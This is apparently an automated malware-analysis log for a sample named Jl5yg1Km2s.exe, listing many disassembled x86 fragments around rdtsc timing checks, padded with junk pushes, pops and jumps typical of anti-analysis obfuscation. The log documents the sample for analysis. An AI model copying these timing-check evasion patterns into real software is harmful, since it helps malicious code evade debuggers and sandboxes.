                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B04C2 second address: 53B054C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8B8C9F7h 0x00000009 xor si, 141Eh 0x0000000e jmp 00007F1CC8B8C9F9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F1CC8B8C9F0h 0x0000001a xor cl, 00000018h 0x0000001d jmp 00007F1CC8B8C9EBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 jne 00007F1D3A70AB68h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007F1CC8B8C9EBh 0x00000034 jmp 00007F1CC8B8C9F8h 0x00000039 popad 0x0000003a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B054C second address: 53B0564 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test bl, 00000007h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0564 second address: 53B0568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0568 second address: 53B056C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B056C second address: 53B0572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0572 second address: 53B0578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0578 second address: 53B057C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B057C second address: 53B0580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A07C0 second address: 53A07F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1CC8B8C9F3h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A07F5 second address: 53A07F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A07F9 second address: 53A07FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A07FF second address: 53A083E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8BB7C42h 0x00000009 and cx, CB98h 0x0000000e jmp 00007F1CC8BB7C3Bh 0x00000013 popfd 0x00000014 mov ch, 9Dh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F1CC8BB7C3Bh 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A083E second address: 53A0842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0842 second address: 53A08D5 instructions: 0x00000000 rdtsc 0x00000002 call 00007F1CC8BB7C40h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a movsx edi, si 0x0000000d popad 0x0000000e and esp, FFFFFFF8h 0x00000011 pushad 0x00000012 mov di, ax 0x00000015 jmp 00007F1CC8BB7C44h 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F1CC8BB7C3Eh 0x00000023 xor esi, 41AB5AB8h 0x00000029 jmp 00007F1CC8BB7C3Bh 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F1CC8BB7C48h 0x00000035 xor si, 9518h 0x0000003a jmp 00007F1CC8BB7C3Bh 0x0000003f popfd 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F1CC8BB7C3Bh 0x0000004b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A08D5 second address: 53A08D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A08D9 second address: 53A08DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A08DF second address: 53A08FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A08FE second address: 53A0904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0904 second address: 53A0913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9EBh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0913 second address: 53A0925 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bl, 3Dh 0x0000000e movzx ecx, bx 0x00000011 popad 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0925 second address: 53A0978 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007F1CC8B8C9F9h 0x00000010 mov esi, dword ptr [ebp+08h] 0x00000013 jmp 00007F1CC8B8C9EEh 0x00000018 sub ebx, ebx 0x0000001a jmp 00007F1CC8B8C9F1h 0x0000001f test esi, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov bh, 54h 0x00000026 movzx ecx, di 0x00000029 popad 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0978 second address: 53A09C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F1D3A73D63Ah 0x0000000f jmp 00007F1CC8BB7C40h 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007F1CC8BB7C3Ch 0x00000024 sbb esi, 36C86DB8h 0x0000002a jmp 00007F1CC8BB7C3Bh 0x0000002f popfd 0x00000030 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A09C9 second address: 53A0A5A instructions: 0x00000000 rdtsc 0x00000002 mov ax, 31EFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushfd 0x0000000a jmp 00007F1CC8B8C9EBh 0x0000000f sbb ecx, 2D86777Eh 0x00000015 jmp 00007F1CC8B8C9F9h 0x0000001a popfd 0x0000001b pop eax 0x0000001c popad 0x0000001d mov ecx, esi 0x0000001f jmp 00007F1CC8B8C9F7h 0x00000024 je 00007F1D3A712370h 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F1CC8B8C9F4h 0x00000031 xor ecx, 1574ACD8h 0x00000037 jmp 00007F1CC8B8C9EBh 0x0000003c popfd 0x0000003d movzx eax, di 0x00000040 popad 0x00000041 test byte ptr [76FB6968h], 00000002h 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov si, E723h 0x0000004f popad 0x00000050 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0A5A second address: 53A0AC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F1D3A73D57Ah 0x0000000f jmp 00007F1CC8BB7C40h 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F1CC8BB7C3Eh 0x0000001e sub cl, FFFFFFC8h 0x00000021 jmp 00007F1CC8BB7C3Bh 0x00000026 popfd 0x00000027 mov esi, 28C4963Fh 0x0000002c popad 0x0000002d xchg eax, ebx 0x0000002e pushad 0x0000002f call 00007F1CC8BB7C40h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0AC4 second address: 53A0AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 pop edi 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F1CC8B8C9F6h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0AEB second address: 53A0AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0AEF second address: 53A0B1E instructions: 0x00000000 rdtsc 0x00000002 call 00007F1CC8B8C9EAh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ax, dx 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1CC8B8C9F9h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0B1E second address: 53A0B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0BAF second address: 53A0BB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0BB5 second address: 53A0C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8BB7C3Ch 0x00000009 add al, FFFFFFC8h 0x0000000c jmp 00007F1CC8BB7C3Bh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pop ebx 0x00000016 jmp 00007F1CC8BB7C45h 0x0000001b mov esp, ebp 0x0000001d jmp 00007F1CC8BB7C3Eh 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jmp 00007F1CC8BB7C3Dh 0x0000002b mov edx, esi 0x0000002d popad 0x0000002e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C0008 second address: 53C000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C000C second address: 53C0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C0012 second address: 53C007C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F1CC8B8C9ECh 0x00000012 sub al, 00000068h 0x00000015 jmp 00007F1CC8B8C9EBh 0x0000001a popfd 0x0000001b call 00007F1CC8B8C9F8h 0x00000020 pop eax 0x00000021 popad 0x00000022 mov bh, C2h 0x00000024 popad 0x00000025 push eax 0x00000026 jmp 00007F1CC8B8C9EDh 0x0000002b xchg eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F1CC8B8C9EDh 0x00000033 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C007C second address: 53C008C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C008C second address: 53C0090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C0090 second address: 53C00F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1CC8BB7C3Dh 0x00000011 adc si, 6546h 0x00000016 jmp 00007F1CC8BB7C41h 0x0000001b popfd 0x0000001c movzx esi, bx 0x0000001f popad 0x00000020 pop ebp 0x00000021 pushad 0x00000022 mov si, dx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushfd 0x00000028 jmp 00007F1CC8BB7C3Bh 0x0000002d add ah, 0000007Eh 0x00000030 jmp 00007F1CC8BB7C49h 0x00000035 popfd 0x00000036 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0D3F second address: 53B0DC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1CC8B8C9ECh 0x00000013 sbb eax, 5AF98988h 0x00000019 jmp 00007F1CC8B8C9EBh 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007F1CC8B8C9F5h 0x00000027 pop ebp 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F1CC8B8C9ECh 0x0000002f jmp 00007F1CC8B8C9F5h 0x00000034 popfd 0x00000035 call 00007F1CC8B8C9F0h 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5430B6B second address: 5430B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5430B6F second address: 5430B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5430B75 second address: 5430B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5430B7B second address: 5430C04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d movzx ecx, di 0x00000010 mov cx, dx 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 push eax 0x00000017 pushfd 0x00000018 jmp 00007F1CC8B8C9F1h 0x0000001d and esi, 79C2B686h 0x00000023 jmp 00007F1CC8B8C9F1h 0x00000028 popfd 0x00000029 pop esi 0x0000002a pushfd 0x0000002b jmp 00007F1CC8B8C9F1h 0x00000030 or ah, FFFFFFE6h 0x00000033 jmp 00007F1CC8B8C9F1h 0x00000038 popfd 0x00000039 popad 0x0000003a xchg eax, ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F1CC8B8C9EDh 0x00000042 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420EA3 second address: 5420EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420EA7 second address: 5420EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420EAB second address: 5420EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420D2F second address: 5420D6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8B8C9F1h 0x00000009 add ax, B426h 0x0000000e jmp 00007F1CC8B8C9F1h 0x00000013 popfd 0x00000014 mov ax, 4957h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420D6B second address: 5420D7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420D7A second address: 5420D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 5420D80 second address: 5420D8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 5420D8F second address: 5420D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, 7DC5h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 5420D98 second address: 5420D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 5420D9E second address: 5420DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 53C03F8 second address: 53C03FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 53C03FE second address: 53C045B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1CC8B8C9EEh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov ecx, edx 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007F1CC8B8C9EFh 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F1CC8B8C9EBh 0x00000024 and ah, 0000006Eh 0x00000027 jmp 00007F1CC8B8C9F9h 0x0000002c popfd 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 54301F6 second address: 54301FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 54301FA second address: 5430217 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 5430217 second address: 543021C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 543021C second address: 543023E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1CC8B8C9F5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 543023E second address: 543026D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1CC8BB7C3Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edx 0x00000015 pop eax 0x00000016 mov ax, bx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 543026D second address: 5430322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov cx, 481Dh 0x00000011 call 00007F1CC8B8C9EAh 0x00000016 pushfd 0x00000017 jmp 00007F1CC8B8C9F2h 0x0000001c sub esi, 3D0722A8h 0x00000022 jmp 00007F1CC8B8C9EBh 0x00000027 popfd 0x00000028 pop ecx 0x00000029 popad 0x0000002a push dword ptr [ebp+08h] 0x0000002d jmp 00007F1CC8B8C9EFh 0x00000032 call 00007F1CC8B8C9E9h 0x00000037 jmp 00007F1CC8B8C9F6h 0x0000003c push eax 0x0000003d pushad 0x0000003e mov ax, di 0x00000041 mov ax, dx 0x00000044 popad 0x00000045 mov eax, dword ptr [esp+04h] 0x00000049 jmp 00007F1CC8B8C9F6h 0x0000004e mov eax, dword ptr [eax] 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F1CC8B8C9EEh 0x00000057 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 5430322 second address: 543033B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 543033B second address: 5430341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 5430341 second address: 5430347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 5430347 second address: 543034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 543034B second address: 5430364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1CC8BB7C3Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 5430364 second address: 543036A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 543038E second address: 54303E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c jmp 00007F1CC8BB7C40h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 movsx edi, ax 0x00000018 pushfd 0x00000019 jmp 00007F1CC8BB7C46h 0x0000001e and ah, 00000078h 0x00000021 jmp 00007F1CC8BB7C3Bh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 54303E3 second address: 54303FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 53D07F5 second address: 53D0812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 53D0812 second address: 53D083F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F1CC8B8C9E9h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1CC8B8C9EDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 53D083F second address: 53D0885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8BB7C47h 0x00000009 xor si, 9F8Eh 0x0000000e jmp 00007F1CC8BB7C49h 0x00000013 popfd 0x00000014 push esi 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
